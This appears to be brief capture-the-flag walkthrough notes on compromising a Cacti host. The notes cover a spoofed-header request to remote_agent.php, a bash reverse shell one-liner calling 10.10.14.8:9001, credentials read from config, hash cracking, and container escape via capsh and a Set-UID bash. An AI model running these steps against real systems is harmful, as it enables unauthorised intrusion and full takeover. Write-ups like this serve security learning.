Jul 24, 2024
Cacti Exploit
remote_agent.php
with specific GET parameters (action=polldata
, X-Forwarded-For=127.0.0.1
, poller_id
, host_id
, local_data_id
)Executing Payload
bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'
encoded and sent via Burp SuiteDatabase Configuration
include/config.php
— Username: root
, Password: root
DB
hostname specified in configurationuser_auth
table)Cracking Hashes
user_auth
) and cracked using hashcat
with correct mode (tested multiple modes, bcrypt identified)FunkyMonkey
for user MarcusEMAIL Vulnerability Information: In an email on the system, pointers to kernel, Cacti, and Docker vulnerabilities
5.4.0-1047
not vulnerable)Privilege Escalation
capsh
binary to elevate privileges within the containerbash
to temp, make bash
Set-UID owned by root, escalate using capsh --uid=0 --gid=0 --
Achieving Root on Host
bash
with -p
flag to inherit privileges, gaining root on host systemroot.txt